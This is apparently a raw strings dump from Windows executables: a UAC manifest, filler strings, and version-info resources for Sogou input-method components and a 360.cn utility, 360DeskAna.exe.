<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjjh
jjjj
jjjjj
VS_VERSION_INFO
StringFileInfo
080404b0
Comments
CompanyName
Sogou.com Inc.
FileDescription
FileVersion
5.0.0.3787
InternalName
SogouPY SogouTSF
LegalCopyright
? 2010 Sogou.com Inc. All rights reserved.
LegalTrademarks
OriginalFilename
SogouTSF.dll
PrivateBuild
ProductName
ProductVersion
5.0.0.3787
SpecialBuild
VarFileInfo
Translation
Menu
Menu
Dialog
System
Cancel
Sting
VS_VERSION_INFO
StringFileInfo
080404b0
Comments
CompanyName
Sogou.com Inc.
FileDescription
FileVersion
5.0.0.3787
InternalName
SogouPY Config
LegalCopyright
? 2010 Sogou.com Inc. All rights reserved.
LegalTrademarks
OriginalFilename
Config.exe
PrivateBuild
ProductName
ProductVersion
5.0.0.3787
SpecialBuild
VarFileInfo
Translation
jjjj
@jjj
@jjj
@jjj
         (((((                  H
VS_VERSION_INFO
StringFileInfo
080404b0
CompanyName
360.cn
FileDescription
FileVersion
1, 0, 0, 1007
InternalName
360DeskAna.exe
LegalCopyright
(C) 360.cn Inc. All Rights Reserved.
OriginalFilename
360DeskAna.exe
ProductName
ProductVersion
1, 0, 0, 1007
VarFileInfo
Translation